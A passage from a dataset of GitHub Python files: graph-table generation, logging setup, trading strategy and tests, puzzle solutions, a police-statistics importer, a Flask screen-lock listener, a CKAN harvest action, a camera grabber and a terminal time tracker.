1000000.0\ntable['cch_phase1_s'] = table['cch_ordering_running_time_s'] + (table['contraction_running_time_ms'] / 1000)\ntable['cch_phase2_s'] = (table['respecting_running_time_ms'] + table['basic_customization_running_time_ms'] + table['perfect_customization_running_time_ms'] + table['graph_build_running_time_ms']) / 1000\ntable = table.reindex(columns=['num_nodes', 'num_edges', 'ch_contraction_running_time_s', 'cch_phase1_s', 'cch_phase2_s'])\ntable = table.round(1)\n\nlines = table.to_latex(escape=False).split(\"\\n\")\n\nlines = lines[:2] + [\n R\" & & & \\multicolumn{3}{c}{Preprocessing [s]} \\\\ \\cmidrule(lr){4-6}\"\n R\" & Vertices & Edges & \\multirow{2}{*}{CH} & \\multicolumn{2}{c}{CCH} \\\\ \\cmidrule(lr){5-6}\"\n R\" & $[\\cdot 10^6]$ & $[\\cdot 10^6]$ & & Phase 1 & Phase 2 \\\\\"\n] + lines[4:]\n\noutput = \"\\n\".join(lines) + \"\\n\"\noutput = re.sub(re.compile('([0-9]{3}(?=[0-9]))'), '\\\\g<0>,\\\\\\\\', output[::-1])[::-1]\n\nwith open(\"paper/table/graphs.tex\", 'w') as f:\n f.write(output)\n","repo_name":"kit-algo/ch_potentials","sub_path":"eval/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"37647447770","text":"from datetime import datetime\nimport logging\nimport sys\nfrom typing import Union\n\nfrom pytz import timezone, utc\n\nfrom lcml.utils.context_util import joinRoot, jsonConfig\n\n\nDEFAULT_FORMAT = \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\nTIME_MESSAGE_FORMAT = \"%(asctime)s - %(message)s\"\nMESSAGE_FORMAT = \"%(message)s\"\nDATE_FORMAT = \"%Y.%m.%d %H:%M:%S\"\n\nDEFAULT_BACKUPS = 20\nDEFAULT_MAX_BYTES = 50e7 # 50MB\n\n\n_levelNames = {\n logging.CRITICAL : 'CRITICAL',\n logging.ERROR : 'ERROR',\n logging.WARNING : 'WARNING',\n logging.INFO : 'INFO',\n logging.DEBUG : 'DEBUG',\n logging.NOTSET : 'NOTSET',\n 'CRITICAL' : logging.CRITICAL,\n 'ERROR' : logging.ERROR,\n 'WARN' : logging.WARNING,\n 'WARNING' : logging.WARNING,\n 'INFO' : logging.INFO,\n 'DEBUG' : logging.DEBUG,\n 'NOTSET' : logging.NOTSET,\n}\n\n\ndef nameToLevel(name: Union[str, int]) -> int:\n \"\"\"Converts the English name for logging level to the logging module's\n internal integer code\"\"\"\n return _levelNames[name.upper()] if isinstance(name, str) else name\n\n\ndef levelToName(level: int) -> str:\n return _levelNames[level]\n\n\ndef getLogFormat(name: str) -> str:\n if name == \"message\":\n return MESSAGE_FORMAT\n elif name == \"time-message\":\n return TIME_MESSAGE_FORMAT\n else:\n return DEFAULT_FORMAT\n\n\nclass LoggingManager:\n \"\"\"Manages app logging configuration. Reads config file with following\n keys:\n 1) 'basicConfig' - values passed to `logging.basicConfig`\n 2) 'handlers' - handler definitions with 'type' attributes either 'stream'\n or 'file'\n 3) 'modules' - list of module specific logger level settings\n See `conf/common/logging.json` for an example\n \"\"\"\n # configuration used by manager, mainly for debugging\n _config = None\n\n @classmethod\n def initLogging(cls, fileName: str=None, fmt: str=None,\n config: dict=None):\n \"\"\"Initializes logging across app. Must be called before logger objects\n are created. Configuration read from\n `$LCML/conf/common/logging.json`.\n\n :param fileName: name of log file written to by FileHandler\n :param fmt: logger format override\n :param config: replacement for default logging config\n \"\"\"\n cls._config = config if config else jsonConfig(\"logging.json\")\n if cls._config.get(\"active\", True):\n # Python libraries may specify NullHandlers; however, this adds them\n # to the root logger. Its having 1 or more handlers effectively\n # prevents `logging.basicConfig()` from doing anything!\n # So to activate logging, these handlers must first be cleared\n logging.root.handlers = []\n\n # time-zone conversion\n tz = timezone(cls._config[\"tz\"])\n def localConverter(*args):\n return utc.localize(datetime.utcnow()).astimezone(tz).timetuple()\n logging.Formatter.converter = localConverter\n\n # set up kwargs for basicConfig()\n kwargs = cls._config[\"basicConfig\"]\n kwargs[\"level\"] = nameToLevel(kwargs[\"level\"])\n\n _format = getLogFormat(fmt if fmt else kwargs[\"format\"])\n kwargs[\"format\"] = _format\n\n # handlers\n handlers = []\n for defn in cls._config[\"handlers\"]:\n hdlrType = defn[\"type\"].lower()\n if hdlrType == \"stream\":\n hdlr = logging.StreamHandler(sys.stdout)\n hdlr.setLevel(nameToLevel(defn[\"level\"]))\n hdlr.setFormatter(logging.Formatter(_format))\n elif hdlrType == \"file\":\n fileName = fileName if fileName else defn[\"filename\"]\n fullFileName = joinRoot(\"logs\", fileName)\n hdlr = logging.FileHandler(filename=fullFileName,\n mode=defn.get(\"mode\", \"a\"))\n else:\n raise ValueError(\"bad handler type: \" + hdlrType)\n handlers.append(hdlr)\n\n kwargs[\"handlers\"] = handlers\n\n logging.basicConfig(**kwargs)\n\n # module-specific logger levels\n for setting in cls._config[\"modules\"]:\n level = nameToLevel(setting[\"level\"])\n logging.getLogger(setting[\"module\"]).setLevel(level)\n","repo_name":"lsst-epo/light_curve_ml","sub_path":"lcml/utils/logging_manager.py","file_name":"logging_manager.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"8711187615","text":"import unittest\nimport pandas as pd\nfrom trade_data_visualizer import process_data # assuming you have a function that processes data\n\nclass TestDataProcessing(unittest.TestCase):\n def setUp(self):\n self.data = [\n {\n \"Date\": \"2023-10-28\", \"Day\": \"Saturday\", \"Entry Time\": \"09:30\", \"Exit Time\": \"16:00\",\n \"Ticker Symbol\": \"AAPL\", \"Long/Short\": \"Long\", \"Entry Price\": 150,\n \"Exit Price\": 155, \"Number of Shares/Contracts\": 100, \"Stop-Loss Price\": 148,\n \"Take-Profit Price\": 160, \"Commission Paid\": 10, \"Trade Duration (minutes)\": 390,\n \"Profit/Loss\": 500, \"Trade Outcome\": \"Profit\", \"Strategy Used\": \"Breakout\"\n },\n # Add more data as needed\n ]\n\n def test_process_data(self):\n df = pd.DataFrame(self.data)\n processed_df = process_data(df) # assuming your function is named 'process_data'\n \n # Now you can write assertions based on what your 'process_data' function is supposed to do.\n # For example, if it's supposed to sort by date:\n self.assertTrue(pd.api.types.is_datetime64_any_dtype(processed_df['Date']))\n self.assertEqual(processed_df.iloc[0]['Date'], pd.Timestamp('2023-10-28'))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"karthik-valliappan/Python-WebApp","sub_path":"test/unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22285478975","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n\r\nclass Strategy(object):\r\n\r\n def __init__(self, series1: pd.DataFrame, series2: pd.DataFrame) -> None:\r\n super().__init__()\r\n\r\n self.series1 = series1\r\n self.series2 = series2\r\n\r\n self.frequency = None\r\n self.sigma_long_open = None\r\n self.sigma_long_close = None\r\n self.sigma_short_open = None\r\n self.sigma_short_close = None\r\n\r\n # output data\r\n self.signal = None\r\n\r\n def _set_parameters(self, \r\n frequency: int = 1, \r\n sigma_long_open: float = 1.25, \r\n sigma_long_close: float = 0.5, \r\n sigma_short_open: float = 1.25, \r\n sigma_short_close: float = 0.5, \r\n ) -> None:\r\n self.frequency = frequency\r\n self.sigma_long_open = sigma_long_open\r\n self.sigma_long_close = sigma_long_close\r\n self.sigma_short_open = sigma_short_open\r\n self.sigma_short_close = sigma_short_close\r\n\r\n def generate_signals(self) -> pd.DataFrame:\r\n '''\r\n generate the trading signals.\r\n 2: open long\r\n 1: close long \r\n 0: nothing\r\n -1: close short\r\n -2: open short\r\n '''\r\n\r\n # date alignment\r\n data = self._date_alignment(self.series1, self.series2)\r\n data['signal'] = 0\r\n\r\n # generate signals\r\n sigma = data['value'].std()\r\n\r\n position = 0\r\n for i in range(0, data.shape[0], self.frequency):\r\n if 0 == position and data.loc[data.index[i], 'value'] <= - self.sigma_long_open * sigma:\r\n position = 1\r\n data.loc[data.index[i], 'signal'] = 2\r\n if 1 == position and data.loc[data.index[i], 'value'] >= - self.sigma_long_close * sigma:\r\n position = 0\r\n data.loc[data.index[i], 'signal'] = 1\r\n \r\n position = 0\r\n for i in range(data.shape[0]):\r\n if 0 == position and data.loc[data.index[i], 'value'] >= self.sigma_short_open * sigma:\r\n position = 1\r\n data.loc[data.index[i], 'signal'] = -2\r\n if 1 == position and data.loc[data.index[i], 'value'] <= self.sigma_short_close * sigma:\r\n position = 0\r\n data.loc[data.index[i], 'signal'] = -1\r\n \r\n return data\r\n\r\n def _date_alignment(self, series1: pd.DataFrame, series2: pd.DataFrame) -> pd.DataFrame:\r\n series1 = series1.copy().rename(columns={'value':'value1'})\r\n series2 = series2.copy().rename(columns={'value':'value2'})\r\n\r\n series_aligned = pd.merge(series1, series2, left_index=True, right_index=True, how='inner')\r\n series_aligned['value'] = (series_aligned['value1'] - series_aligned['value2'])\r\n return series_aligned","repo_name":"HBhswl/ATCS_statistical_arbitrage","sub_path":"src/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40597597665","text":"with open('input05.txt', 'r') as f:\n input = [x.strip() for x in f.readlines()]\n\nboard = {}\n\nfor line in input:\n start, end = line.split(' -> ')\n s_x, s_y = [int(i) for i in start.split(',')]\n e_x, e_y = [int(i) for i in end.split(',')]\n\n s_x, e_x = min(s_x, e_x), max(s_x, e_x)\n s_y, e_y = min(s_y, e_y), max(s_y, e_y)\n\n # print(f'{s_x} {s_y} > {e_x} {e_y}')\n\n if s_x != e_x and s_y != e_y:\n continue\n\n for x in range(s_x, e_x+1):\n for y in range(s_y, e_y+1):\n if (x, y) in board:\n board[(x, y)] += 1\n else:\n board[(x, y)] = 1\n # print(f\"board element {x},{y} is now {board[(x,y)]}\")\n\nnum_intersect = sum([intersects >= 2 for intersects in board.values()])\n\nprint(num_intersect)\n\ndef visualize(board):\n for y in range(20):\n for x in range(20):\n if (x,y) in board:\n print(board[(x,y)], end='')\n print()\n\n# visualize(board)","repo_name":"dsoklic/AdventOfCode2021","sub_path":"05/05_1.py","file_name":"05_1.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23087090904","text":"from typing import List\nimport random\n\n\nclass PartitionRes:\n def __init__(self, left_size: int, mid_size: int):\n self.left_size: int = left_size\n self.mid_size: int = mid_size\n\n\ndef partition(v: List[int], start: int, end: int, pivot: int) -> PartitionRes:\n left = start\n right = end\n mid = start\n while mid <= right:\n if v[mid] < pivot:\n v[mid], v[left] = v[left], v[mid]\n mid += 1\n left += 1\n elif v[mid] > pivot:\n v[mid], v[right] = v[right], v[mid]\n right -= 1\n else:\n mid += 1\n return PartitionRes(left - start, right - left + 1)\n\n\ndef _get_elem_by_rnk(v: List[int], k: int, start: int, end: int) -> int:\n pivot = v[int(random.uniform(start, end + 1))]\n p = partition(v, start, end, pivot)\n left_size, mid_size = p.left_size, p.mid_size\n if k < left_size:\n return _get_elem_by_rnk(v, k, start, start + left_size - 1)\n elif k < left_size + mid_size:\n return pivot\n else:\n return _get_elem_by_rnk(v, k - left_size - mid_size, start + left_size + mid_size, end)\n\n\ndef get_elem_by_rnk(v: List[int], k: int) -> int:\n if k >= len(v):\n raise ValueError(\"k must be less than len(v)\")\n return _get_elem_by_rnk(v, k, 0, len(v) - 1)\n\n\ndef smallest_k(v: List[int], k: int) -> List[int]:\n if k <= 0 or k > len(v):\n raise ValueError(\"k must be in (0, len(v))\")\n threshold = get_elem_by_rnk(v, k - 1)\n smallest = list(filter(lambda x: x < threshold, v))\n return smallest + [threshold] * (k - len(smallest))\n\n\ndef ns(f):\n return next(f).strip()\n\n\ndef solve(fp: str):\n print(f\"# {fp}\")\n with open(fp) as f:\n n, k = map(int, ns(f).split())\n v = list(map(int, ns(f).split()))\n res = smallest_k(v, k)\n print(sorted(res))\n print()\n\n\nsolve(\"../testcases/17_14/01.txt\")\nsolve(\"../testcases/17_14/02.txt\")\nsolve(\"../testcases/17_14/03.txt\")\nsolve(\"../testcases/17_14/04.txt\")\n\n# # ../testcases/17_14/01.txt\n# [-5, -2, -1]\n\n# # ../testcases/17_14/02.txt\n# [-9, -7, -7, -3, -2, 0, 1, 3, 5, 6]\n\n# # ../testcases/17_14/03.txt\n# [-6, -6, -5, -5, -4, -4, -2, -1, -1, -1, 0, 0, 2, 3, 3, 4, 4, 4, 8, 8, 9, 11, 12, 12, 13, 13, 16, 16, 17, 17, 18, 21, 22, 23, 23, 24, 24, 24, 24, 25, 26, 28, 28, 29, 30, 31, 32, 33, 35, 40, 41, 41, 42, 43, 48, 49, 49, 50, 51, 51, 55, 55, 57, 58, 59, 59, 59, 61, 62, 62, 63, 64, 65, 65, 66, 67, 67, 68, 68, 70, 71, 71, 72, 75, 75, 75, 77, 77, 77, 78, 78, 79, 79, 80, 80, 80, 81, 83, 87, 89]\n\n# # ../testcases/17_14/04.txt\n# [0, 0, 0]\n","repo_name":"e5pe0n/algorithm-training","sub_path":"cracking_the_coding_interview_6th/chapter17/python/17_14_v05.py","file_name":"17_14_v05.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30571351572","text":"from DTPySide import *\nimport urllib3\nfrom pythonping import ping\n\ndef get_current_info(key):\n try:\n url='https://ipinfo.io/json'\n pool=urllib3.connection_from_url(url,timeout=1)\n r=pool.urlopen(\"GET\",\"/\")\n text=r.data.decode(\"utf-8\")\n res = json.loads(text)\n \n if res.get(\"error\"):\n # Rate Limit Error\n return \"Error\"\n \n if key==\"all\":\n return res\n else:\n return res[key]\n except:\n return \"Failed\"\n\ndef ping_ip(ip, count, timeout):\n try:\n res=ping(ip, count=count, timeout=timeout/1000)\n\n if res.stats_success_ratio:\n true_rtt_avg = (res.rtt_avg_ms*res.stats_packets_sent-res.stats_packets_lost*timeout)/res.stats_packets_returned\n else:\n true_rtt_avg = \"inf\"\n \n return true_rtt_avg, res.stats_success_ratio\n except:\n return \"inf\", -1\n","repo_name":"Holence/WireSock-GUI","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"42031389003","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport openpyxl\nimport os\nimport sys\nimport time\nimport datetime\nsys.path.append('../')\nfrom BaseDatos import BaseDatos\nimport parseoDistrito\nimport ParseoMes\n\n# conexion a la bd y a la coleccion que queremos\nbd = BaseDatos.baseDatosClass()\ncon = bd.conexion()\nbdEstSeguridad = bd.conexionEstSeguridad(con)\nbdEstDetenidos = bd.conexionEstDetenidos(con)\nbdEstAccidentes = bd.conexionEstAccidentes(con)\n\n\n# Obtiene el archivo del que va a tomar los datos\nruta_app = './excel/' # obtiene ruta del script\ncontenido = os.listdir(ruta_app) # obtiene lista con archivos/dir \nroute = ruta_app + contenido[0]\n\n# doc = excel con los datos que queremos\ndoc = openpyxl.load_workbook(route)\nprint(doc)\n\ndoc.sheetnames\n# hojas del excel a examinar SEGURIDAD\nhoja = doc['SEGURIDAD']\n# hojas del excel a examinar DETENIDOS\nhoja2 = doc['DETENIDOS X DISTRITOS']\n# hojas del excel a examinar ACCIDENTES\nhoja3 = doc['ACCIDENTES']\n\nx = datetime.datetime.now()\nmes = x.month - 2\nprint(mes)\nm = ParseoMes.ParseoMesClass()\nprint(m.parseoMes(mes))\n\nseleccion = hoja['A4':'F24']\nfor filas in seleccion:\n for i in range(0,6):\n if i == 0:\n distrito = filas[i].value\n #print(\"Distrito: \" + distrito)\n if i == 1:\n personas = filas[i].value\n #print(\"Personas: \" + str(personas))\n if i == 2: \n patrimonio = filas[i].value\n #print(patrimonio)\n if i == 3:\n armas = filas[i].value\n #print(armas)\n if i == 4:\n ten_drogas = filas[i].value\n #print(ten_drogas)\n if i == 5:\n con_drogas = filas[i].value\n #print(con_drogas) \n d = parseoDistrito.ParseoDistritoClass() \n bd.insertarEstSeguridad(bdEstSeguridad, d.parseoDistrito(distrito), personas, patrimonio, armas, ten_drogas, con_drogas, m.parseoMes(mes))\n\nprint(\"Datos insertados en la bd EstSeguridad\")\n\nseleccion2 = hoja2['A4':'B24']\nfor filas in seleccion2:\n for i in range(0,2):\n if i == 0:\n distrito = filas[i].value\n #print(\"Distrito: \" + distrito)\n if i == 1:\n detenidos = filas[i].value\n #print(\"Detenidos: \" + str(detenidos))\n d = parseoDistrito.ParseoDistritoClass()\n bd.insertarEstDetenidos(bdEstDetenidos, d.parseoDistrito(distrito), detenidos, m.parseoMes(mes))\n\nprint(\"Datos insertados en la bd EstDetenidos\")\n\nseleccion3 = hoja3['A4:C24']\nfor filas in seleccion3:\n for i in range(0,3):\n if i == 0:\n distrito = filas[i].value\n if i == 1:\n conHeridos = filas[i].value\n if i == 2:\n sinHeridos = filas[i].value \n d = parseoDistrito.ParseoDistritoClass()\n bd.insertarEstAccidentes(bdEstAccidentes, d.parseoDistrito(distrito), conHeridos, sinHeridos, m.parseoMes(mes))\n\nprint(\"Datos insertados en la bd estAccidentes\")\n\n\n \n","repo_name":"MadAlert/TFG","sub_path":"Python/WebScraping/insertarDatosPolicia.py","file_name":"insertarDatosPolicia.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34781161216","text":"import json\nimport os\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef ReadInstructionsFile():\n data = {}\n with open(\"C:\\\\Users\\\\Ringba\\\\py\\\\instructions.json\", 'r') as f:\n data = json.load(f)\n return jsonify(data)\n\n\n# A route to return all of the available entries in our catalog.\n@app.route('/', methods=['POST'])\ndef api_all():\n request_data = request.get_json()\n if validRequest(request_data):\n\n # read existing json to memory. you do this to preserve whatever existing data.\n with open(\"C:\\\\Users\\\\Ringba\\\\py\\\\instructions.json\", 'r') as jsonfile:\n json_content = json.load(jsonfile) # this is now in memory! you can use it outside 'open'\n\n # add the id key-value pair (rmbr that it already has the \"name\" key value)\n json_content[\"target\"] = request_data[\"target\"]\n json_content[\"message\"] = request_data[\"message\"]\n json_content[\"status\"] = True\n json_content[\"IsCloseAllowed\"] = False\n\n with open(\"C:\\\\Users\\\\Ringba\\\\py\\\\instructions.json\", 'w') as jsonfile:\n json.dump(json_content, jsonfile, indent=4) # you decide the indentation level\n\n os.startfile(\"C:\\\\Users\\\\Ringba\\\\py\\\\ScreenLocker.lnk\")\n return \"True\"\n else:\n return \"False\"\n\n\n@app.route('/', methods=['DELETE'])\ndef api_kill():\n # read existing json to memory. you do this to preserve whatever existing data.\n with open(\"C:\\\\Users\\\\Ringba\\\\py\\\\instructions.json\", 'r') as jsonfile:\n json_content = json.load(jsonfile) # this is now in memory! you can use it outside 'open'\n\n json_content[\"status\"] = False\n json_content[\"IsCloseAllowed\"] = True\n\n with open(\"C:\\\\Users\\\\Ringba\\\\py\\\\instructions.json\", 'w') as jsonfile:\n json.dump(json_content, jsonfile, indent=4) # you decide the indentation level\n\n os.system(\"taskkill /f /im ScreenLocker.exe\")\n return \"True\"\n\n\ndef validRequest(reqObject):\n if \"target\" in reqObject and \"message\" in reqObject:\n return True\n else:\n return False\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"maxwellpalmeida/RemoteScreenLocker2","sub_path":"Listener/ScreenLocker.py","file_name":"ScreenLocker.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15111431899","text":"s = [int(input())]\r\n\r\ncnt = 1\r\nwhile True:\r\n cnt += 1\r\n if s[-1]%2==0:\r\n add = s[-1]/2\r\n else:\r\n add = s[-1]*3+1\r\n if add in s:\r\n print(cnt)\r\n break\r\n else:\r\n s.append(add)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc116/B/4981062.py","file_name":"4981062.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"20671541031","text":"from collections import deque\n\n\nclass Solution:\n def findClosestElements(self, arr: list[int], k: int, x: int) -> list[int]:\n idx = self.closest_left_bin_search(arr, x)\n print(idx)\n if idx + 1 < len(arr) and abs(arr[idx] - x) > abs(arr[idx + 1] - x):\n idx += 1\n print(idx)\n result = deque([arr[idx]])\n res_l, res_r = idx - 1, idx + 1\n while len(result) < k and res_l >= 0 and res_r < len(arr):\n if abs(arr[res_l] - x) <= abs(arr[res_r] - x):\n result.appendleft(arr[res_l])\n res_l -= 1\n else:\n result.append(arr[res_r])\n res_r += 1\n \n while len(result) < k and res_l >= 0:\n result.appendleft(arr[res_l])\n res_l -= 1\n \n while len(result) < k and res_r < len(arr):\n result.append(arr[res_r])\n res_r += 1\n return result\n \n # нахождение ближайшего элемента в итоге проще делать нахождением последнего меньшего числа\n def closest_left_bin_search(self, arr: list[int], target: int) -> int:\n l = 0\n r = len(arr) - 1\n while l < r:\n mid = (l + r + 1) // 2\n if arr[mid] > target:\n r = mid - 1\n else:\n l = mid\n return l\n \n # тоже работает, но например на [1, 3], 2, 1 выдает 3, а не 1,\n # что по логике правильно, но литкод просит дать в таком случа обязатлеьно 1\n def bin_search(self, arr: list[int], target: int) -> int:\n l = 0\n r = len(arr) - 1\n \n while l < r:\n mid = (l + r) // 2\n if arr[mid] == target:\n return mid\n elif arr[mid] < target:\n l = mid + 1\n else:\n r = mid - 1\n return l\n\n\ns = Solution()\nprint(\n s.bin_search(\n [1, 4], 2,\n ),\n)\n\n","repo_name":"AbdullaB1/leetcode","sub_path":"658. Find K Closest Elements.py","file_name":"658. Find K Closest Elements.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32679458745","text":"import logging\n\nfrom ckan.logic import NotFound, check_access\n\nfrom ckanext.harvest.model import (HarvestSource, HarvestJob)\n\nlog = logging.getLogger(__name__)\n\ndef harvest_source_delete(context,data_dict):\n log.info('Deleting harvest source: %r', data_dict)\n check_access('harvest_source_delete',context,data_dict)\n\n source_id = data_dict.get('id')\n source = HarvestSource.get(source_id)\n if not source:\n log.warn('Harvest source %s does not exist', source_id)\n raise NotFound('Harvest source %s does not exist' % source_id)\n\n # Don't actually delete the record, just flag it as inactive\n source.active = False\n source.save()\n\n # Abort any pending jobs\n jobs = HarvestJob.filter(source=source,status=u'New')\n if jobs:\n log.info('Aborting %i jobs due to deleted harvest source', jobs.count())\n for job in jobs:\n job.status = u'Aborted'\n job.save()\n\n log.info('Harvest source %s deleted', source_id)\n return True\n","repo_name":"datagovhr/data.gov.hr","sub_path":"src/ckanext-harvest/ckanext/harvest/logic/action/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"2746995025","text":"import cv2 as c \n\ncap = c.VideoCapture(2)\ncontador = 0\nwhile True:\n _, frame = cap.read()\n \n k = c.waitKey(1)\n if k == ord('q'):\n break\n elif k == ord('t'):\n image_path = 'Frame_{}.jpg'.format(contador) \n c.imwrite(image_path, frame)\n\n contador += 1\n\n c.imshow('frame', frame)\n \nframe.release()\nc.destroyAllWindows()\n","repo_name":"denvars/reading_camera_opencv","sub_path":"readCamera.py","file_name":"readCamera.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"17143920759","text":"'''\nFun with time tracking!\n'''\nimport argparse\nimport logging\nimport re\nimport sys\nimport threading\nimport time\n\nfrom collections import namedtuple, defaultdict\nfrom datetime import datetime, timedelta\nfrom functools import wraps\n\n\narg_parser = argparse.ArgumentParser(description=__doc__)\narg_parser.add_argument('--debug', action='store_true')\narg_parser.add_argument('args', nargs='*')\n\nlogger = logging.getLogger('whelps.timetracker')\n\n\n# _find_getch came from this answer on stackoverflow.com\n# http://stackoverflow.com/a/21659588/344286\ndef _find_getch():\n try:\n import termios\n except ImportError:\n logger.debug('Not on POSIX platform, using msvcrt for getch')\n # Non-POSIX. Return msvcrt's (Windows') getch.\n import msvcrt\n @wraps(msvcrt.getch)\n def _getch():\n ch = msvcrt.getch() \n try:\n ch = ch.decode()\n except UnicodeDecodeError:\n if ch in ('\\000', '\\xe0'):\n ctrl = ch\n ch = msvcrt.getch()\n logger.info('%r was Windows control character'\n ' skipping %r', ctrl, ch)\n ch = ''\n else:\n logger.exception('Unable to decode chr %r', ch)\n ch = str(ch)\n return ch\n return _getch\n\n # POSIX system. Create and return a getch that manipulates the tty.\n import sys, tty\n def _getch():\n logger.debug('Storing off old settings')\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(fd)\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n logger.debug('Old settings have been restored')\n if ord(ch) == 3:\n raise KeyboardInterrupt('^C entered')\n if ord(ch) == 4:\n raise EOFError('EOF entered')\n return ch\n\n return _getch\n\ngetch = _find_getch()\n\nstart = datetime.now()\ntext = ''\n\n\ndef display(stopper, display_event):\n while not stopper.isSet():\n display_event.wait(timeout=1)\n display_event.clear()\n time_spent = datetime.now() - start\n s = int(time_spent.total_seconds())\n hours = s // 3600\n s = s - (hours*3600)\n minutes = s // 60\n seconds = s - (minutes*60)\n spent = '{:0>2}:{:0>2}:{:0>2}'.format(hours, minutes, seconds)\n\n if stopper.isSet():\n logger.debug('Stopping thread...')\n else:\n print('\\r{} - Task: {}'.format(spent, text), end='')\n\n\ndef store_task(desc, start, end):\n logger.info('Storing task %r-%r: %r', start, end, desc)\n with open('timesheet.txt', 'a') as f:\n fmt = '{:%Y-%m-%d %H:%M:%S} - {:%Y-%m-%d %H:%M:%S}\\n\\t{}'\n print(fmt.format(start, end, desc), file=f)\n\n\ndef hack_time():\n global text, start\n logger.debug('Hacking time... well, to record time spent hacking')\n stopper = threading.Event()\n display_event = threading.Event()\n display_thread = threading.Thread(\n target=display,\n args=(stopper, display_event),\n )\n display_thread.start()\n display_event.set()\n\n ch = ''\n while True:\n try:\n ch = getch()\n logger.debug('Read character %r', ch)\n if ch == '\\r':\n print()\n if text == 'q':\n logger.debug('Quitting...')\n stopper.set()\n break\n else:\n store_task(desc=text, start=start, end=datetime.now())\n text = ''\n start = datetime.now()\n elif ch.isspace() or ch.isprintable():\n text += ch\n elif ch in ('\\x7f', '\\x08'):\n spaces = re.sub('[^\\t]', ' ', 'xx:xx:xx - Task:'+text)\n print('\\r', spaces, end='')\n text = text[:-1]\n elif ch == '\\x1b':\n data = [getch(), getch()]\n logger.info('Got linux control character %r, eating'\n ' two bytes %r', ch, data)\n else:\n logger.warning('Unknown char: %r', ch)\n except (KeyboardInterrupt, EOFError) as e:\n stopper.set()\n print()\n break\n except:\n stopper.set()\n raise\n finally:\n display_event.set()\n\n logger.debug('Waiting for display thread to join...')\n display_thread.join()\n logger.debug('Display thread absorbed')\n\n\ndef pomodoro(days, hours, minutes, seconds):\n global text, start\n logger.debug('Running pomodoro interval for %dd%dh%dm%ds',\n days, hours, minutes, seconds)\n stopper = threading.Event()\n display_event = threading.Event()\n display_thread = threading.Thread(\n target=display,\n args=(stopper, display_event),\n )\n display_thread.start()\n display_event.set()\n\n start = datetime.now()\n tomato_length = timedelta(days=days, hours=hours, minutes=minutes,\n seconds=seconds)\n end = start+tomato_length\n\n ch = ''\n while True:\n try:\n ch = getch()\n if ch == 'q':\n stopper.set()\n print()\n break\n except (KeyboardInterrupt, EOFError) as e:\n stopper.set()\n print()\n break\n except:\n stopper.set()\n raise\n finally:\n display_event.set()\n display_thread.join()\n\n\n\ndef parse_timespan(timespan):\n logger.debug('Parsing %r', timespan)\n text_start, _, text_end = timespan.partition(' - ')\n fmt = '%Y-%m-%d %H:%M:%S'\n start = datetime.strptime(text_start, fmt)\n end = datetime.strptime(text_end, fmt)\n return start, end\n\n\ndef report_for_date(date):\n try:\n Span = namedtuple('Span', 'start, end')\n tasks = defaultdict(list)\n with open('timesheet.txt', 'r') as f:\n for timespan, task in zip(f,f):\n try:\n start, end = parse_timespan(timespan.rstrip())\n except ValueError:\n print('Unable to parse timespan {!r}, task: {!r}'\n .format(timespan.strip(), task.strip()))\n else:\n if start.date() <= date <= end.date():\n tasks[task.strip()].append(Span(start=start, end=end))\n\n for task in sorted(tasks):\n print(task)\n total = timedelta(0)\n for span in tasks[task]:\n total += span.end - span.start\n print('\\t{}'.format(total))\n except FileNotFoundError:\n print('Unable to find timesheet.txt, does it exist here?')\n\n\ndef main(args):\n if not args.args:\n hack_time()\n else:\n # TODO: Fix this pattern -W. Werner, 2016-11-04\n pattern = r'(?=.*[smhd])(?:(\\d+)d)?\\s*(?:(\\d+)h)?\\s*(?:(\\d+)m)?\\s*(?:(\\d+)s)?'\n #match = re.match(pattern, args.args)\n match = None\n if match is None:\n if args.args == 'today':\n report_for_date(datetime.now().date())\n else:\n print('Unknown argument {!r}'.format(args.args))\n else:\n days, hours, minutes, seconds = (int(val or 0) for val in match.groups())\n pomodoro(days=days, hours=hours, minutes=minutes, 